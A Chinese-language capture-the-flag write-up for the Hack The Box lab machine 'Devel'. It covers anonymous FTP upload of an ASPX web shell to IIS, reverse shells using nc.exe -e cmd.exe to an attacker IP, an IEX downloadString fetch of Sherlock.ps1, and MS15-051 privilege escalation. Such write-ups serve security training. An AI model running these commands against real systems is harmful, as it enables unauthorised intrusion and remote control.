hackthebox-Devel (考点：ftp/IIS/windows)不用msf

用msf做很快，很多人做这台机器写writeup也是用msf做的。但针对oscp，本篇文章不用msf

nmap

看到21ftp要想到进去看看，找敏感文件

匿名anonymous进入

也没啥。但是你也有可能看到一些shell已经在里面了，那是因为之前有人做的留下的。开启机器，不一定会全部重置，会有前人的痕迹。我发现是这样。

可以看到IIS的图片。

再看80

扫描，没什么发现
打开80网页10.10.10.5，发现也就是ftp里的图片，说明往ftp里送东西，可以显示在80网页上

OK、这里要知道IIS，得用asp/aspx文件

locate cmd.aspx

网页版cmd，随便用一个。
在ftp里输入 put cmd.aspx 放进去。
或者通过在文件夹底部的输入框里输入ftp://10.10.10.5。以文件夹形式看ftp，在这里直接把文件复制粘贴进去。

再在网页端执行命令。一切OK。证明有效。

那么在cmd里执行弹shell的命令到我本机。这样我就拿shell了

方法有很多的。
因为是Windows。所以我习惯用smb服务用来传送文件&执行了。工具
先把nc.exe放好到共享的文件夹里 工具下载
打开服务

python smbserver.py Share '/root/exp'

在网页cmd里执行\\10.10.14.57\share\nc.exe -e cmd.exe 10.10.14.57 4445
另外本地监听，收到

当然是个低权限。
可以用powershell的powerup.ps1和夏洛克ps1来寻找提权漏洞。操作方法这些就不细说了，以前的文章说了很多。

powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.57/Sherlock.ps1')

有很多可以提，这次我选择MS15-051，因为昨天写的bastard才用过，可以参考
bastard

但也有些不同，因为systeminfo查看，这台机器不是bastard的64位，所以两个文件要换32位的

本来想用bastard那样的方法，直接简单

\\10.10.14.57\share\ms15-051.exe "\\10.10.14.57\share\nc.exe -e cmd 10.10.14.57 443"

但是一直不管用，虽然显示成功执行了，但就是收不到shell。搞不懂

后来我把这俩文件拷到靶机里。

copy \\10.10.14.57\share\ms15-051.exe
copy \\10.10.14.57\share\nc.exe

最后

c:\Windows\Temp\ms15-051.exe "c:\Windows\Temp\nc.exe -e cmd 10.10.14.57 8080"

成功收到。。。搞定